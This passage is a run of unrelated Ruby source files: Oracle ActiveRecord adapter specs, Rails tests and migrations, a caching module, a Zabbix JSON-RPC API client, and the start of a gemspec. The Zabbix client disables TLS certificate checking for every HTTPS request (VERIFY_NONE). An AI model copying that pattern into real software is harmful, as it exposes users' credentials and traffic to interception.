assert_equal "news", mc("news")
assert_equal "Напишите нам", mc("Write to Us")
end
def test_invalid_locale_name
@context.registers[:site].config['msgcat']['locale'] = 'uk'
out, err = capture_io do
assert_equal "News", mc("News")
end
assert_match(/msgcat warning: 'uk' wasn't found/, err)
end
def test_cur_page_in_another_locale__this_locale
assert_equal "<a href='#' class=' disabled'>ru</a>", cur_page_in_another_locale('ru')
end
def test_cur_page_in_another_locale__this_locale_custom_label
assert_equal "<a href='#' class=' disabled'>Booo</a>", cur_page_in_another_locale('ru', 'Booo')
end
def test_cur_page_in_another_locale__this_locale_custom_class
assert_equal "<a href='#' class='myclass1 myclass2 disabled'>ru</a>", cur_page_in_another_locale('ru', nil, "myclass1 myclass2")
end
def test_cur_page_in_another_locale__no_url_in_config
@context.registers[:site].config['url'] = nil
r = assert_raises(RuntimeError) do
cur_page_in_another_locale 'lt'
end
# pp r
assert_match(/bad argument/, r.to_s)
end
def test_cur_page_in_another_locale__domain_no_deploy
@context.registers[:site].config['msgcat']['deploy'] = nil
@context.registers[:site].config['url'] = 'http://lt.example.com'
assert_equal "<a href='http://lt.example.com/foo/bar' class=' '>lt</a>", cur_page_in_another_locale('lt')
end
def test_cur_page_in_another_locale__domain_no_deploy_no_msgcat
@context.registers[:site].config['msgcat'] = nil
@context.registers[:site].config['url'] = 'http://lt.example.com'
assert_equal "<a href='http://lt.example.com/foo/bar' class=' '>lt</a>", cur_page_in_another_locale('lt')
end
def test_cur_page_in_another_locale__domain
@context.registers[:site].config['msgcat']['deploy'] = 'domain'
@context.registers[:site].config['url'] = 'http://lt.example.com'
assert_equal "<a href='http://lt.example.com/foo/bar' class=' '>lt</a>", cur_page_in_another_locale('lt')
end
def test_cur_page_in_another_locale__nearby_no_baseurl
@context.registers[:site].config['msgcat']['deploy'] = 'nearby'
@context.registers[:site].config['url'] = '/blog/lt'
r = assert_raises(RuntimeError) do
cur_page_in_another_locale 'lt'
end
assert_match(/no 'baseurl' property/, r.to_s)
end
def test_cur_page_in_another_locale__nearby
@context.registers[:site].config['msgcat']['locale'] = 'uk'
@context.registers[:site].config['msgcat']['deploy'] = 'nearby'
@context.registers[:site].config['baseurl'] = '/blog/lt'
assert_equal "<a href='/blog/lt/foo/bar' class=' '>lt</a>", cur_page_in_another_locale('lt')
end
end
| 32.333333 | 132 | 0.621649 |
e9aefe91e18f32e7212c24afdd775dfcc361adc3 | 155 | class CreateEditors < ActiveRecord::Migration[6.0]
def change
create_table :editors do |t|
t.string :key
t.timestamps
end
end
end
| 15.5 | 50 | 0.658065 |
26d15d2fb717681ae3e4014f19555bfaf8a6be0b | 17,808 | require File.dirname(__FILE__) + '/../../spec_helper.rb'
describe "OracleEnhancedAdapter establish connection" do
it "should connect to database" do
ActiveRecord::Base.establish_connection(CONNECTION_PARAMS)
ActiveRecord::Base.connection.should_not be_nil
ActiveRecord::Base.connection.class.should == ActiveRecord::ConnectionAdapters::OracleEnhancedAdapter
end
it "should connect to database as SYSDBA" do
ActiveRecord::Base.establish_connection(SYS_CONNECTION_PARAMS)
ActiveRecord::Base.connection.should_not be_nil
ActiveRecord::Base.connection.class.should == ActiveRecord::ConnectionAdapters::OracleEnhancedAdapter
end
it "should be active after connection to database" do
ActiveRecord::Base.establish_connection(CONNECTION_PARAMS)
ActiveRecord::Base.connection.should be_active
end
it "should not be active after disconnection to database" do
ActiveRecord::Base.establish_connection(CONNECTION_PARAMS)
ActiveRecord::Base.connection.disconnect!
ActiveRecord::Base.connection.should_not be_active
end
it "should be active after reconnection to database" do
ActiveRecord::Base.establish_connection(CONNECTION_PARAMS)
ActiveRecord::Base.connection.reconnect!
ActiveRecord::Base.connection.should be_active
end
end
describe "OracleEnhancedAdapter schema dump" do
before(:all) do
if !defined?(RUBY_ENGINE)
@old_conn = ActiveRecord::Base.oracle_connection(CONNECTION_PARAMS)
@old_conn.class.should == ActiveRecord::ConnectionAdapters::OracleAdapter
elsif RUBY_ENGINE == 'jruby'
@old_conn = ActiveRecord::Base.jdbc_connection(JDBC_CONNECTION_PARAMS)
@old_conn.class.should == ActiveRecord::ConnectionAdapters::JdbcAdapter
end
@new_conn = ActiveRecord::Base.oracle_enhanced_connection(CONNECTION_PARAMS)
@new_conn.class.should == ActiveRecord::ConnectionAdapters::OracleEnhancedAdapter
end
unless defined?(RUBY_ENGINE) && RUBY_ENGINE == "ruby" && RUBY_VERSION =~ /^1\.9/
it "should return the same tables list as original oracle adapter" do
@new_conn.tables.sort.should == @old_conn.tables.sort
end
it "should return the same index list as original oracle adapter" do
@new_conn.indexes('employees').sort_by(&:name).should == @old_conn.indexes('employees').sort_by(&:name)
end
it "should return the same pk_and_sequence_for as original oracle adapter" do
if @old_conn.respond_to?(:pk_and_sequence_for)
@new_conn.tables.each do |t|
@new_conn.pk_and_sequence_for(t).should == @old_conn.pk_and_sequence_for(t)
end
end
end
it "should return the same structure dump as original oracle adapter" do
@new_conn.structure_dump.should == @old_conn.structure_dump
end
it "should return the same structure drop as original oracle adapter" do
@new_conn.structure_drop.should == @old_conn.structure_drop
end
end
it "should return the character size of nvarchar fields" do
@new_conn.execute <<-SQL
CREATE TABLE nvarchartable (
session_id NVARCHAR2(255) DEFAULT NULL
)
SQL
if /.*session_id nvarchar2\((\d+)\).*/ =~ @new_conn.structure_dump
"#$1".should == "255"
end
@new_conn.execute "DROP TABLE nvarchartable"
end
end
describe "OracleEnhancedAdapter database stucture dump extentions" do
before(:all) do
ActiveRecord::Base.establish_connection(CONNECTION_PARAMS)
@conn = ActiveRecord::Base.connection
@conn.execute <<-SQL
CREATE TABLE nvarchartable (
unq_nvarchar NVARCHAR2(255) DEFAULT NULL
)
SQL
end
after(:all) do
@conn.execute "DROP TABLE nvarchartable"
end
it "should return the character size of nvarchar fields" do
if /.*unq_nvarchar nvarchar2\((\d+)\).*/ =~ @conn.structure_dump
"#$1".should == "255"
end
end
end
describe "OracleEnhancedAdapter database session store" do
before(:all) do
ActiveRecord::Base.establish_connection(CONNECTION_PARAMS)
@conn = ActiveRecord::Base.connection
@conn.execute <<-SQL
CREATE TABLE sessions (
id NUMBER(38,0) NOT NULL,
session_id VARCHAR2(255) DEFAULT NULL,
data CLOB DEFAULT NULL,
created_at DATE DEFAULT NULL,
updated_at DATE DEFAULT NULL,
PRIMARY KEY (ID)
)
SQL
@conn.execute <<-SQL
CREATE SEQUENCE sessions_seq MINVALUE 1 MAXVALUE 999999999999999999999999999
INCREMENT BY 1 START WITH 10040 CACHE 20 NOORDER NOCYCLE
SQL
if ENV['RAILS_GEM_VERSION'] >= '2.3'
@session_class = ActiveRecord::SessionStore::Session
else
@session_class = CGI::Session::ActiveRecordStore::Session
end
end
after(:all) do
@conn.execute "DROP TABLE sessions"
@conn.execute "DROP SEQUENCE sessions_seq"
end
it "should create sessions table" do
ActiveRecord::Base.connection.tables.grep("sessions").should_not be_empty
end
it "should save session data" do
@session = @session_class.new :session_id => "111111", :data => "something" #, :updated_at => Time.now
@session.save!
@session = @session_class.find_by_session_id("111111")
@session.data.should == "something"
end
it "should change session data when partial updates enabled" do
return pending("Not in this ActiveRecord version") unless @session_class.respond_to?(:partial_updates=)
@session_class.partial_updates = true
@session = @session_class.new :session_id => "222222", :data => "something" #, :updated_at => Time.now
@session.save!
@session = @session_class.find_by_session_id("222222")
@session.data = "other thing"
@session.save!
# second save should call again blob writing callback
@session.save!
@session = @session_class.find_by_session_id("222222")
@session.data.should == "other thing"
end
it "should have one enhanced_write_lobs callback" do
return pending("Not in this ActiveRecord version") unless @session_class.respond_to?(:after_save_callback_chain)
@session_class.after_save_callback_chain.select{|cb| cb.method == :enhanced_write_lobs}.should have(1).record
end
it "should not set sessions table session_id column type as integer if emulate_integers_by_column_name is true" do
ActiveRecord::ConnectionAdapters::OracleEnhancedAdapter.emulate_integers_by_column_name = true
columns = @conn.columns('sessions')
column = columns.detect{|c| c.name == "session_id"}
column.type.should == :string
end
end
describe "OracleEnhancedAdapter ignore specified table columns" do
before(:all) do
ActiveRecord::Base.establish_connection(CONNECTION_PARAMS)
@conn = ActiveRecord::Base.connection
@conn.execute <<-SQL
CREATE TABLE test_employees (
id NUMBER,
first_name VARCHAR2(20),
last_name VARCHAR2(25),
email VARCHAR2(25),
phone_number VARCHAR2(20),
hire_date DATE,
job_id NUMBER,
salary NUMBER,
commission_pct NUMBER(2,2),
manager_id NUMBER(6),
department_id NUMBER(4,0),
created_at DATE
)
SQL
@conn.execute <<-SQL
CREATE SEQUENCE test_employees_seq MINVALUE 1
INCREMENT BY 1 START WITH 1 CACHE 20 NOORDER NOCYCLE
SQL
end
after(:all) do
@conn.execute "DROP TABLE test_employees"
@conn.execute "DROP SEQUENCE test_employees_seq"
end
after(:each) do
Object.send(:remove_const, "TestEmployee")
end
it "should ignore specified table columns" do
class ::TestEmployee < ActiveRecord::Base
ignore_table_columns :phone_number, :hire_date
end
TestEmployee.connection.columns('test_employees').select{|c| ['phone_number','hire_date'].include?(c.name) }.should be_empty
end
it "should ignore specified table columns specified in several lines" do
class ::TestEmployee < ActiveRecord::Base
ignore_table_columns :phone_number
ignore_table_columns :hire_date
end
TestEmployee.connection.columns('test_employees').select{|c| ['phone_number','hire_date'].include?(c.name) }.should be_empty
end
it "should not ignore unspecified table columns" do
class ::TestEmployee < ActiveRecord::Base
ignore_table_columns :phone_number, :hire_date
end
TestEmployee.connection.columns('test_employees').select{|c| c.name == 'email' }.should_not be_empty
end
end
describe "OracleEnhancedAdapter table and sequence creation with non-default primary key" do
before(:all) do
ActiveRecord::Base.establish_connection(CONNECTION_PARAMS)
ActiveRecord::Schema.define do
suppress_messages do
create_table :keyboards, :force => true, :id => false do |t|
t.primary_key :key_number
t.string :name
end
create_table :id_keyboards, :force => true do |t|
t.string :name
end
end
end
class ::Keyboard < ActiveRecord::Base
set_primary_key :key_number
end
class ::IdKeyboard < ActiveRecord::Base
end
end
after(:all) do
ActiveRecord::Schema.define do
suppress_messages do
drop_table :keyboards
drop_table :id_keyboards
end
end
Object.send(:remove_const, "Keyboard")
Object.send(:remove_const, "IdKeyboard")
end
it "should create sequence for non-default primary key" do
ActiveRecord::Base.connection.next_sequence_value(Keyboard.sequence_name).should_not be_nil
end
it "should create sequence for default primary key" do
ActiveRecord::Base.connection.next_sequence_value(IdKeyboard.sequence_name).should_not be_nil
end
end
describe "OracleEnhancedAdapter without composite_primary_keys" do
before(:all) do
ActiveRecord::Base.establish_connection(CONNECTION_PARAMS)
Object.send(:remove_const, 'CompositePrimaryKeys') if defined?(CompositePrimaryKeys)
class ::Employee < ActiveRecord::Base
set_primary_key :employee_id
end
end
it "should tell ActiveRecord that count distinct is supported" do
ActiveRecord::Base.connection.supports_count_distinct?.should be_true
end
it "should execute correct SQL COUNT DISTINCT statement" do
lambda { Employee.count(:employee_id, :distinct => true) }.should_not raise_error
end
end
describe "OracleEnhancedAdapter sequence creation parameters" do
before(:all) do
ActiveRecord::Base.establish_connection(CONNECTION_PARAMS)
end
def create_test_employees_table(sequence_start_value = nil)
ActiveRecord::Schema.define do
suppress_messages do
create_table :test_employees, sequence_start_value ? {:sequence_start_value => sequence_start_value} : {} do |t|
t.string :first_name
t.string :last_name
end
end
end
end
def save_default_sequence_start_value
@saved_sequence_start_value = ActiveRecord::ConnectionAdapters::OracleEnhancedAdapter.default_sequence_start_value
end
def restore_default_sequence_start_value
ActiveRecord::ConnectionAdapters::OracleEnhancedAdapter.default_sequence_start_value = @saved_sequence_start_value
end
before(:each) do
save_default_sequence_start_value
end
after(:each) do
restore_default_sequence_start_value
ActiveRecord::Schema.define do
suppress_messages do
drop_table :test_employees
end
end
Object.send(:remove_const, "TestEmployee")
end
it "should use default sequence start value 10000" do
ActiveRecord::ConnectionAdapters::OracleEnhancedAdapter.default_sequence_start_value.should == 10000
create_test_employees_table
class ::TestEmployee < ActiveRecord::Base; end
employee = TestEmployee.create!
employee.id.should == 10000
end
it "should use specified default sequence start value" do
ActiveRecord::ConnectionAdapters::OracleEnhancedAdapter.default_sequence_start_value = 1
create_test_employees_table
class ::TestEmployee < ActiveRecord::Base; end
employee = TestEmployee.create!
employee.id.should == 1
end
it "should use sequence start value from table definition" do
create_test_employees_table(10)
class ::TestEmployee < ActiveRecord::Base; end
employee = TestEmployee.create!
employee.id.should == 10
end
it "should use sequence start value and other options from table definition" do
create_test_employees_table("100 NOCACHE INCREMENT BY 10")
class ::TestEmployee < ActiveRecord::Base; end
employee = TestEmployee.create!
employee.id.should == 100
employee = TestEmployee.create!
employee.id.should == 110
end
end
describe "OracleEnhancedAdapter table and column comments" do
before(:all) do
ActiveRecord::Base.establish_connection(CONNECTION_PARAMS)
@conn = ActiveRecord::Base.connection
end
def create_test_employees_table(table_comment=nil, column_comments={})
ActiveRecord::Schema.define do
suppress_messages do
create_table :test_employees, :comment => table_comment do |t|
t.string :first_name, :comment => column_comments[:first_name]
t.string :last_name, :comment => column_comments[:last_name]
end
end
end
end
after(:each) do
ActiveRecord::Schema.define do
suppress_messages do
drop_table :test_employees
end
end
Object.send(:remove_const, "TestEmployee")
ActiveRecord::Base.table_name_prefix = nil
end
it "should create table with table comment" do
table_comment = "Test Employees"
create_test_employees_table(table_comment)
class ::TestEmployee < ActiveRecord::Base; end
@conn.table_comment("test_employees").should == table_comment
TestEmployee.table_comment.should == table_comment
end
it "should create table with columns comment" do
column_comments = {:first_name => "Given Name", :last_name => "Surname"}
create_test_employees_table(nil, column_comments)
class ::TestEmployee < ActiveRecord::Base; end
[:first_name, :last_name].each do |attr|
@conn.column_comment("test_employees", attr.to_s).should == column_comments[attr]
end
[:first_name, :last_name].each do |attr|
TestEmployee.columns_hash[attr.to_s].comment.should == column_comments[attr]
end
end
it "should create table with table and columns comment and custom table name prefix" do
ActiveRecord::Base.table_name_prefix = "xxx_"
table_comment = "Test Employees"
column_comments = {:first_name => "Given Name", :last_name => "Surname"}
create_test_employees_table(table_comment, column_comments)
class ::TestEmployee < ActiveRecord::Base; end
@conn.table_comment(TestEmployee.table_name).should == table_comment
TestEmployee.table_comment.should == table_comment
[:first_name, :last_name].each do |attr|
@conn.column_comment(TestEmployee.table_name, attr.to_s).should == column_comments[attr]
end
[:first_name, :last_name].each do |attr|
TestEmployee.columns_hash[attr.to_s].comment.should == column_comments[attr]
end
end
end
describe "OracleEnhancedAdapter column quoting" do
before(:all) do
ActiveRecord::Base.establish_connection(CONNECTION_PARAMS)
@conn = ActiveRecord::Base.connection
end
def create_test_reserved_words_table
ActiveRecord::Schema.define do
suppress_messages do
create_table :test_reserved_words do |t|
t.string :varchar2
t.integer :integer
end
end
end
end
after(:each) do
ActiveRecord::Schema.define do
suppress_messages do
drop_table :test_reserved_words
end
end
Object.send(:remove_const, "TestReservedWord")
ActiveRecord::Base.table_name_prefix = nil
end
it "should allow creation of a table with oracle reserved words as column names" do
create_test_reserved_words_table
class ::TestReservedWord < ActiveRecord::Base; end
[:varchar2, :integer].each do |attr|
TestReservedWord.columns_hash[attr.to_s].name.should == attr.to_s
end
end
end
describe "OracleEnhancedAdapter valid table names" do
before(:all) do
@adapter = ActiveRecord::ConnectionAdapters::OracleEnhancedAdapter
end
it "should be valid with letters and digits" do
@adapter.valid_table_name?("abc_123").should be_true
end
it "should be valid with schema name" do
@adapter.valid_table_name?("abc_123.def_456").should be_true
end
it "should be valid with $ in name" do
@adapter.valid_table_name?("sys.v$session").should be_true
end
it "should not be valid with two dots in name" do
@adapter.valid_table_name?("abc_123.def_456.ghi_789").should be_false
end
it "should not be valid with invalid characters" do
@adapter.valid_table_name?("warehouse-things").should be_false
end
end
describe "OracleEnhancedAdapter table quoting" do
before(:all) do
ActiveRecord::Base.establish_connection(CONNECTION_PARAMS)
@conn = ActiveRecord::Base.connection
end
def create_warehouse_things_table
ActiveRecord::Schema.define do
suppress_messages do
create_table "warehouse-things" do |t|
t.string :name
t.integer :foo
end
end
end
end
after(:each) do
ActiveRecord::Schema.define do
suppress_messages do
drop_table "warehouse-things"
end
end
Object.send(:remove_const, "WarehouseThing")
ActiveRecord::Base.table_name_prefix = nil
end
it "should allow creation of a table with non alphanumeric characters" do
create_warehouse_things_table
class ::WarehouseThing < ActiveRecord::Base
set_table_name "warehouse-things"
end
wh = WarehouseThing.create!(:name => "Foo", :foo => 2)
wh.id.should_not be_nil
end
end
| 32.144404 | 128 | 0.716981 |
ff52567a0f9b90d2e15ff119842c963bc08064ad | 1,650 | require 'test_helper'
class UsersEditTest < ActionDispatch::IntegrationTest
def setup
@user = users(:morna)
end
test "unsuccessful edit" do
log_in_as(@user)
get edit_user_path(@user)
assert_template 'users/edit'
patch user_path(@user), params: { user: { name: "blah",
email: "foo@invalid",
password: "foo",
password_confirmation: "bar" } }
assert_template 'users/edit'
end
test "sucessful edit with friendly forwarding" do
get edit_user_path(@user)
log_in_as(@user)
assert_redirected_to edit_user_url(@user)
assert session[:forwarding_url].blank?
name = "Foo Bar"
email = "[email protected]"
#password = "foobar"
patch user_path(@user), params: { user: { name: name,
email: email,
password: "",
password_confirmation: "" } }
assert_not flash.empty?
assert_redirected_to @user
@user.reload
assert_equal name, @user.name
assert_equal email, @user.email
end
test "should redirect edit when not logged in" do
get edit_user_path(@user)
assert_not flash.empty?
assert_redirected_to login_url
end
test "should redirect update when not logged in" do
patch user_path(@user), params: { user: { name: @user.name,
email: @user.email } }
assert_not flash.empty?
assert_redirected_to login_url
end
end | 31.730769 | 78 | 0.550909 |
bfb6a33ebdbecdf813051de7e8095b14fb8aa67b | 156 | # frozen_string_literal: true
class AddIncomeToPeople < ActiveRecord::Migration[6.0]
def change
add_column :people, :income_level, :string
end
end
| 19.5 | 54 | 0.762821 |
7977e387301bcf99febb5bb808d6168937532e92 | 118 | if Rails.env.development? || Rails.env.test?
require 'rspec/core/rake_task'
RSpec::Core::RakeTask.new(:spec)
end
| 19.666667 | 44 | 0.720339 |
1ad4e0ec10a80b02299d5cfae0b392f7377837f5 | 1,163 | # Copyright, 2017, by Samuel G. D. Williams. <http://www.codeotaku.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
require "geospatial/kml/version"
| 52.863636 | 79 | 0.77644 |
abf23b88c843ec7cc269a9a339875eafe8c49c90 | 4,548 | module Cache
module Cacheable
include ResponseWrapper
# thin wrapper around Rails.cache.fetch. Reads the value of key from cache if it exists, otherwise executes
# the passed block and caches the result. Set force_write=true to make it always execute the block and write
# to the cache.
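    # Illustrative usage (a hedged sketch; `UserApi` and `expensive_lookup` are
    # hypothetical names, not part of this codebase):
    #
    #   class UserApi
    #     extend Cache::Cacheable
    #   end
    #
    #   # Returns the cached value under "UserApi/123" when present; otherwise
    #   # runs the block and caches the result for the configured expiration.
    #   UserApi.fetch_from_cache(123) { expensive_lookup(123) }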
def fetch_from_cache(id=nil, force_write=false)
key = cache_key id
expiration = self.expires_in
Rails.logger.debug "#{self.name} cache_key will be #{key}, expiration #{expiration}, forced: #{force_write}"
value = Rails.cache.fetch(
key,
:expires_in => expiration,
:force => force_write
) do
if block_given?
response = yield
response = process_response_before_caching(response, {id: id, force_write: force_write})
cached_entry = response.nil? ? NilClass : response
cached_entry
end
end
(value == NilClass) ? nil : value
end
# reads from cache if possible, otherwise executes the passed block and caches the result.
# if the passed block throws an exception, it will be logged, and the result will be cached for a much shorter time.
# WARNING: Do not use "return foo" inside the passed block or you will short-circuit the flow
# and nothing will be cached.
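    # Illustrative usage (hedged sketch; the class and the remote call are hypothetical):
    #
    #   GradesApi.smart_fetch_from_cache(id: uid) do
    #     fetch_grades_from_remote(uid)  # an exception here is logged and cached with a short lifespan
    #   end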
def smart_fetch_from_cache(opts={}, &block)
id = opts[:id]
key = cache_key id
force_write = opts[:force_write]
expiration = self.expires_in
Rails.logger.debug "#{self.name} cache_key will be #{key}, expiration #{expiration}"
unless force_write
entry = Rails.cache.read key
if entry
Rails.logger.debug "#{self.name} Entry is already in cache: #{key}"
return (entry == NilClass) ? nil : entry
end
end
wrapped_response = handling_exceptions(key, opts, &block)
response = wrapped_response[:response]
if wrapped_response[:exception]
Rails.logger.debug "#{self.name} Error occurred; writing entry to cache with short lifespan: #{key}"
expiration = Settings.cache.expiration.failure
else
Rails.logger.debug "#{self.name} Writing entry to cache: #{key}"
end
response = process_response_before_caching(response, opts)
cached_entry = (response.nil?) ? NilClass : response
Rails.cache.write(key,
cached_entry,
:expires_in => expiration,
:force => true)
response
end
# Override to cache JSON, decorate the response with metadata, etc.
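    # A minimal override sketch (hypothetical, assuming the response is a Hash):
    #
    #   def process_response_before_caching(response, opts)
    #     response.merge(cached_at: Time.zone.now.to_i)
    #   end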
def process_response_before_caching(response, opts)
response
end
def in_cache?(id = nil)
key = cache_key id
Rails.cache.exist? key
end
def expires_in(expires_key = nil)
expires_key ||= self.name
expirations = Settings.cache.expiration.marshal_dump
expiration_config = expirations[expires_key.to_sym] || expirations[:default]
begin
exp = parse_expiration_setting(expiration_config)
if exp.blank? || exp == 0
raise ArgumentError, 'No expiration'
else
[exp, Settings.cache.maximum_expires_in].min
end
rescue ArgumentError => e
logger.error "Cache expiration configured as #{expiration_config}; resetting to default #{expirations[:default]}. #{e.class}: #{e.message}\n #{e.backtrace.join "\n "}"
expirations[:default]
end
end
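    # Expiration settings may be a number of seconds or a string of the form
    # "NEXT_HH_MM", which is converted into the number of seconds remaining
    # until the next occurrence of that local time. For example (illustrative):
    #
    #   parse_expiration_setting(3600)          # => 3600
    #   parse_expiration_setting('NEXT_08_00')  # => seconds until the next 08:00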
def parse_expiration_setting(exp)
if exp.is_a?(String) && (parsed = /NEXT_(?<hour>\d+)_(?<minute>\d+)/.match(exp))
hour = parsed[:hour]
next_time = Time.zone.today.in_time_zone.to_datetime.advance(hours: parsed[:hour].to_i,
minutes: parsed[:minute].to_i)
now = Time.zone.now.to_i
if now >= next_time.to_i
next_time = next_time.advance(days: 1)
end
next_time.to_i - now
else
exp
end
end
def bearfacts_derived_expiration
      # Bearfacts data is refreshed daily at 07:30, so always expire at the next 08:00 sharp.
parse_expiration_setting('NEXT_08_00')
end
def expire(id = nil)
key = cache_key id
Rails.cache.delete(key)
Rails.logger.debug "Expired cache_key #{key}"
end
def cache_key(id = nil)
id.nil? ? self.name : "#{self.name}/#{id}"
end
def write_cache(value, id = nil)
Rails.cache.write(cache_key(id),
value,
:expires_in => self.expires_in,
:force => true)
end
end
end
| 35.255814 | 175 | 0.636324 |
7a7c3e1704c9f926c6980d06bcc62bc28d64ad49 | 623 | require 'test_helper'
class UsersProfileTest < ActionDispatch::IntegrationTest
include ApplicationHelper
def setup
@user = users(:michael)
end
test "profile display" do
log_in_as(@user)
get user_path(@user)
assert_template 'users/show'
assert_select 'title', full_title(@user.name)
assert_select 'h1', text: @user.name
assert_select 'h1>img.gravatar'
assert_match @user.microposts.count.to_s, response.body
assert_select 'div.pagination', count: 1
@user.microposts.paginate(page: 1).each do |micropost|
assert_match micropost.content, response.body
end
end
end | 27.086957 | 59 | 0.723917 |
b92098b7a383bcd8aa50455fb2d9b869f4a6ca7a | 1,882 | include QuadiconHelper
describe "layouts/listnav/_security_group.html.haml" do
before :each do
set_controller_for_view("security_group")
assign(:panels, "ems_prop" => true, "ems_rel" => true)
allow(view).to receive(:truncate_length).and_return(15)
allow(view).to receive(:role_allows).and_return(true)
end
["openstack"].each do |t|
before :each do
allow_any_instance_of(User).to receive(:get_timezone).and_return(Time.zone)
provider = FactoryGirl.create("ems_#{t}".to_sym)
@security_group = FactoryGirl.create("security_group_#{t}".to_sym,
:ext_management_system => provider.network_manager,
:name => 'A test')
vm = FactoryGirl.create("vm_#{t}".to_sym)
network = FactoryGirl.create("cloud_network_#{t}".to_sym)
subnet = FactoryGirl.create("cloud_subnet_#{t}".to_sym, :cloud_network => network)
vm.network_ports << network_port = FactoryGirl.create("network_port_#{t}".to_sym,
:device => vm,
:security_groups => [@security_group])
FactoryGirl.create(:cloud_subnet_network_port, :cloud_subnet => subnet, :network_port => network_port)
end
context "for #{t}" do
it "relationships links uses restful path in #{t.camelize}" do
@record = @security_group
render
expect(response).to include("Show this Security Group's parent Network Provider\" href=\"/ems_network/show/#{@record.ext_management_system.id}\">")
expect(response).to include("Show all Instances\" onclick=\"return miqCheckForChanges()\" href=\"/security_group/show/#{@record.id}?display=instances\">")
end
end
end
end
| 50.864865 | 162 | 0.602019 |
396b71c36e1795567aeb9491879eb2b37f064aaa | 4,285 | require 'net/http'
require 'json'
require 'openssl'
class ZabbixApi
class Client
# @param (see ZabbixApi::Client#initialize)
# @return [Hash]
attr_reader :options
# @return [Integer]
def id
rand(100_000)
end
# Returns the API version from the Zabbix Server
#
# @return [String]
def api_version
@api_version ||= api_request(method: 'apiinfo.version', params: {})
end
# Log in to the Zabbix Server and generate an auth token using the API
#
# @return [Hash]
def auth
api_request(
method: 'user.login',
params: {
user: @options[:user],
password: @options[:password]
}
)
end
# Initializes a new Client object
#
# @param options [Hash]
    # @option options [String] :url The URL of the Zabbix API (example: 'http://localhost/zabbix/api_jsonrpc.php')
    # @option options [String] :user
    # @option options [String] :password
    # @option options [String] :http_user A user for basic auth (optional)
    # @option options [String] :http_password A password for basic auth (optional)
    # @option options [Integer] :timeout Timeout for requests in seconds (default: 60)
#
# @return [ZabbixApi::Client]
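    # Example (illustrative values only):
    #
    #   client = ZabbixApi::Client.new(
    #     url:      'http://localhost/zabbix/api_jsonrpc.php',
    #     user:     'Admin',
    #     password: 'zabbix'
    #   )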
def initialize(options = {})
@options = options
if !ENV['http_proxy'].nil? && options[:no_proxy] != true
@proxy_uri = URI.parse(ENV['http_proxy'])
@proxy_host = @proxy_uri.host
@proxy_port = @proxy_uri.port
@proxy_user, @proxy_pass = @proxy_uri.userinfo.split(/:/) if @proxy_uri.userinfo
end
      # Warn (currently disabled) when the server's API version is not 4.0.x or 4.2.x.
      unless api_version =~ %r{^4\.[02]\.\d+$}
        # log "[WARN] Zabbix API version: #{api_version} is not supported by this version of zabbixapi"
      end
@auth_hash = auth
end
# Convert message body to JSON string for the Zabbix API
#
# @param body [Hash]
# @return [String]
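    # For example (illustrative; the id is random and auth comes from login), a body of
    #   { method: 'host.get', params: { output: 'extend' } }
    # is serialized into a JSON-RPC 2.0 envelope such as
    #   '{"method":"host.get","params":{"output":"extend"},"id":12345,"jsonrpc":"2.0","auth":"<token>"}'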
def message_json(body)
message = {
method: body[:method],
params: body[:params],
id: id,
jsonrpc: '2.0'
}
message[:auth] = @auth_hash unless body[:method] == 'apiinfo.version' || body[:method] == 'user.login'
JSON.generate(message)
end
# @param body [String]
# @return [String]
def http_request(body)
uri = URI.parse(@options[:url])
      # Set the timeout to the default (60 seconds) or to what the user passed
timeout = @options[:timeout].nil? ? 60 : @options[:timeout]
puts "[DEBUG] Timeout for request set to #{timeout} seconds" if @options[:debug]
http =
if @proxy_uri
Net::HTTP.Proxy(@proxy_host, @proxy_port, @proxy_user, @proxy_pass).new(uri.host, uri.port)
else
Net::HTTP.new(uri.host, uri.port)
end
if uri.scheme == 'https'
http.use_ssl = true
http.verify_mode = OpenSSL::SSL::VERIFY_NONE
end
http.open_timeout = timeout
http.read_timeout = timeout
request = Net::HTTP::Post.new(uri.request_uri)
request.basic_auth @options[:http_user], @options[:http_password] if @options[:http_user]
request.add_field('Content-Type', 'application/json-rpc')
request.body = body
response = http.request(request)
raise HttpError.new("HTTP Error: #{response.code} on #{@options[:url]}", response) unless response.code == '200'
puts "[DEBUG] Get answer: #{response.body}" if @options[:debug]
response.body
end
# @param body [String]
# @return [Hash, String]
def _request(body)
puts "[DEBUG] Send request: #{body}" if @options[:debug]
result = JSON.parse(http_request(body))
raise ApiError.new("Server answer API error\n #{JSON.pretty_unparse(result['error'])}\n on request:\n #{pretty_body(body)}", result) if result['error']
result['result']
end
def pretty_body(body)
parsed_body = JSON.parse(body)
# If password is in body hide it
parsed_body['params']['password'] = '***' if parsed_body['params'].is_a?(Hash) && parsed_body['params'].key?('password')
JSON.pretty_unparse(parsed_body)
end
# Execute Zabbix API requests and return response
#
# @param body [Hash]
# @return [Hash, String]
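    # Example (illustrative):
    #
    #   client.api_request(method: 'host.get', params: { output: 'extend' })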
def api_request(body)
_request message_json(body)
end
end
end
| 29.756944 | 157 | 0.616569 |
8793a0fb3e7c41fa39f9deb609bd8b83344c3747 | 1,299 | lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require_relative 'lib/learnosity_utils/version'
Gem::Specification.new do |spec|
spec.name = 'learnosity_utils'
spec.version = LearnosityUtils::VERSION
spec.authors = ['Chris Connell']
spec.email = ['[email protected]']
spec.summary = 'An easy interface to learnosity endpoints with configuration support'
spec.homepage = 'https://github.com/LYNx785/learnosity_utils'
spec.license = 'MIT'
# The `git ls-files -z` loads the files in the RubyGem that have been added into git.
spec.files = Dir.chdir(File.expand_path('..', __FILE__)) do
